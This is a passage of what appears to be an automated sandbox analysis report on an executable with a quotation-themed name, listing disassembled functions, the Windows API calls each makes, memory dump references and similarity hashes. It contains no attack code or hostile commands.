                                                                                • API String ID: 973152223-0
                                                                                • Opcode ID: 318766a007564a5c8c6069328ff7bf9d8ddc724485930b67641b25b8ac31027b
                                                                                • Instruction ID: 983d4f283b3a49842741e08d62faa859851885946f81c7e75766fedec90a3088
                                                                                • Opcode Fuzzy Hash: 318766a007564a5c8c6069328ff7bf9d8ddc724485930b67641b25b8ac31027b
                                                                                • Instruction Fuzzy Hash: 32319F70202219EFDF20EF56DD44A9B7BACEB00755F20803AF904E61D0D279DE40DBA9
                                                                                Function 00402410 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
                                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3677997916-0
                                                                                • Opcode ID: 8647bc16be9bbeeb019502bd2fcd7cece1f0f24b9204c75c98ec28f9745f9c71
                                                                                • Instruction ID: ea61b96732c3ecdd8e38099917432d45b641eb3d8d4d3075f09eb17731070f47
                                                                                • Opcode Fuzzy Hash: 8647bc16be9bbeeb019502bd2fcd7cece1f0f24b9204c75c98ec28f9745f9c71
                                                                                • Instruction Fuzzy Hash: 7111A771905205FFDF14DF64C6889AEBBB4EF11349F20847FE141B62C0D2B84A45DB5A
                                                                                Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: 6f3fd260d9a20665192313664cef065be83871c58b0681ff97f62226ed226405
                                                                                • Instruction ID: 8ec6bfb8ef4f3ff43576048fe9568e939b5e998f238dec90285f5c94a9fc96e2
                                                                                • Opcode Fuzzy Hash: 6f3fd260d9a20665192313664cef065be83871c58b0681ff97f62226ed226405
                                                                                • Instruction Fuzzy Hash: 2201F431B24210ABE7294B389E04B6A36A8F710314F11823BF911F66F1D7B8DC029B4D
                                                                                Function 004061FC Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(?,?,?,00403295,00000009), ref: 0040620E
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406229
                                                                                  • Part of subcall function 0040618E: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004061A5
                                                                                  • Part of subcall function 0040618E: wsprintfA.USER32 ref: 004061DE
                                                                                  • Part of subcall function 0040618E: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004061F2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                • String ID:
                                                                                • API String ID: 2547128583-0
                                                                                • Opcode ID: 2c630675a567476a72db336401282eceef6d354bbdda173821c126d7c14613da
                                                                                • Instruction ID: 835994d0d4e2d07c36af23a3dc0c9bac066575a7a99d708227b603b56203bf9f
                                                                                • Opcode Fuzzy Hash: 2c630675a567476a72db336401282eceef6d354bbdda173821c126d7c14613da
                                                                                • Instruction Fuzzy Hash: 7EE08632A04111BAD650B6745D0496B73AC9B84740302487EF906F2185E7389C3196AA
                                                                                Function 00405AD6 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFileAttributesA.KERNELBASE(00000003,00402CF9,C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe,80000000,00000003), ref: 00405ADA
                                                                                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AFC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: File$AttributesCreate
                                                                                • String ID:
                                                                                • API String ID: 415043291-0
                                                                                • Opcode ID: 4a69860c6089f1fb7fd455c1891d9cc54c05e48a968a67635bcc5e625bd0c43f
                                                                                • Instruction ID: 2e597581bf20324382b204af2e2b9293bc3b27f4d9e8cb915424ec39c2be7a6e
                                                                                • Opcode Fuzzy Hash: 4a69860c6089f1fb7fd455c1891d9cc54c05e48a968a67635bcc5e625bd0c43f
                                                                                • Instruction Fuzzy Hash: A7D09E31658201EFFF098F20DD16F2EBBA2EB84B00F10962CBA92941E0D6755815DB26
                                                                                Function 004055BF Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateDirectoryA.KERNELBASE(?,00000000,0040321E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 004055C5
                                                                                • GetLastError.KERNEL32 ref: 004055D3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectoryErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1375471231-0
                                                                                • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                                                • Instruction ID: ee333ff4e59061917a1f290c3015eab559b7a368ac9c9957fcbd809aee07952f
                                                                                • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                                                • Instruction Fuzzy Hash: 04C08C31618102EBDB200B30CE08B073E61AB00381F208831A006F10E4CA349000C93F
                                                                                Function 0040255C Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: wsprintf
                                                                                • String ID:
                                                                                • API String ID: 2111968516-0
                                                                                • Opcode ID: 97c6a5e1d166d86dd5d038022cf0a981cbb0fc355984b71d19d783c84eb5d483
                                                                                • Instruction ID: 55544bde1ffbc8e2725db5e9f059dcd5497d6f225edeae162a206f27e82fdad8
                                                                                • Opcode Fuzzy Hash: 97c6a5e1d166d86dd5d038022cf0a981cbb0fc355984b71d19d783c84eb5d483
                                                                                • Instruction Fuzzy Hash: F721FB70C04299BEDF318B584A585AFBF74AF11318F1484BBE491B62D1C1BD8A85DF1D
                                                                                Function 00402B44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Open
                                                                                • String ID:
                                                                                • API String ID: 71445658-0
                                                                                • Opcode ID: ed1d997f1767e4ebe1524a955060e6e59f62574de8c72c2eb948d7caa6f8d669
                                                                                • Instruction ID: 806e3b40af95552ac91145e5354a2e2caa18036cb762c00ee55acc3717e10e35
                                                                                • Opcode Fuzzy Hash: ed1d997f1767e4ebe1524a955060e6e59f62574de8c72c2eb948d7caa6f8d669
                                                                                • Instruction Fuzzy Hash: D3E04FB6240108AFDB00EFA4DD46FA537ECE714701F008021B608D6091C674E5108B69
                                                                                Function 00405B4E Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,004128D8,0040A8D8,004031E0,00409130,00409130,004030E4,004128D8,00004000,?,00000000,00402F8E), ref: 00405B62
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: ffd4dfc917ffc97e7d907f9c2c90699c203f3b0ebfd4578ed28d6b2a376640fe
                                                                                • Instruction ID: c996f9a7b3ae33303237a126fc5a394e9691c2321a0fe14ef9137570749964f2
                                                                                • Opcode Fuzzy Hash: ffd4dfc917ffc97e7d907f9c2c90699c203f3b0ebfd4578ed28d6b2a376640fe
                                                                                • Instruction Fuzzy Hash: EAE08C3221465EABCF109E509C00EEB3B6CEB00360F008432FD24E2090D230F8209BA4
                                                                                Function 00405B7D Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WriteFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,0040EF1E,0040A8D8,00403164,0040A8D8,0040EF1E,004128D8,00004000,?,00000000,00402F8E,00000004), ref: 00405B91
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                • Instruction ID: 30ff8eedcc03066b87caa2a29a7ef1e7350fb4aaf77a02d24525aee886acae2a
                                                                                • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                • Instruction Fuzzy Hash: 19E0EC3261425AEFEF609E659C00AEB7B7CFB05360F008432F925E6190D635F9219BA5
                                                                                Function 1000270B Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38301650689.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.38301620249.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38301679644.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38301712469.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                • Instruction ID: 4f82052a8ee677216feeb46ba648c84afb962adc58c95b92ee0d34447feb5494
                                                                                • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                • Instruction Fuzzy Hash: B5F09BF19092A0DEF360DF688CC4B063FE4E3983D5B03892AE358F6269EB7441448B19
                                                                                Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 6ba3a5c734e985ed629f10114e2f019316f9f8eb369504b12af0ad305adee80a
                                                                                • Instruction ID: 83084666205c60dee55275756f9b5a6509ae601666284ef718d0d22824b4410c
                                                                                • Opcode Fuzzy Hash: 6ba3a5c734e985ed629f10114e2f019316f9f8eb369504b12af0ad305adee80a
                                                                                • Instruction Fuzzy Hash: DCD01277B14100ABDB10EBA49A08A9E77A5AB60329B308637D201F21D1D6B9CA559A29
                                                                                Function 00404048 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetDlgItemTextA.USER32(?,?,00000000), ref: 00404062
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: ItemText
                                                                                • String ID:
                                                                                • API String ID: 3367045223-0
                                                                                • Opcode ID: e9fac022f5a56b095fb31f9536c058b792927055fb4936a4566be794776724c6
                                                                                • Instruction ID: e527cde694e4746e823f20d7cbf8bde5da20a15a663149da90d8392309f3eb92
                                                                                • Opcode Fuzzy Hash: e9fac022f5a56b095fb31f9536c058b792927055fb4936a4566be794776724c6
                                                                                • Instruction Fuzzy Hash: 88C04C75148640BFD741A755CC42F1FB799EF94315F40C92EB59CA11D1CA3686209E26
                                                                                Function 00404094 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageA.USER32(0001041E,00000000,00000000,00000000), ref: 004040A6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: 50a7dacb6371fe0cd67611078dbaf3ccf85a23f01bbb2752a0812b92d5b89748
                                                                                • Instruction ID: add50700843ac817ab7d6e51381e723622021bba1cfe7f2961aa6f321ae6f442
                                                                                • Opcode Fuzzy Hash: 50a7dacb6371fe0cd67611078dbaf3ccf85a23f01bbb2752a0812b92d5b89748
                                                                                • Instruction Fuzzy Hash: 1CC04C71744201BAEA319B509D49F0777986750700F6644257320B60D1C6B4E410E62D
                                                                                Function 0040407D Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageA.USER32(00000028,?,00000001,00403EAE), ref: 0040408B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: 3d364c0f7cae05b6249e8bcc12743ca4c2e9a63f4273028bf1a1c1708aea3851
                                                                                • Instruction ID: a78b9239c319e9cb66b61a8ea9955aebbc10e43728856a3b978814f56e37e297
                                                                                • Opcode Fuzzy Hash: 3d364c0f7cae05b6249e8bcc12743ca4c2e9a63f4273028bf1a1c1708aea3851
                                                                                • Instruction Fuzzy Hash: 19B092B6684200BAEE228B00DD09F457AB2E7A8742F008024B200240B0CAB200A1DB19
                                                                                Function 004031E3 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EE1,?), ref: 004031F1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
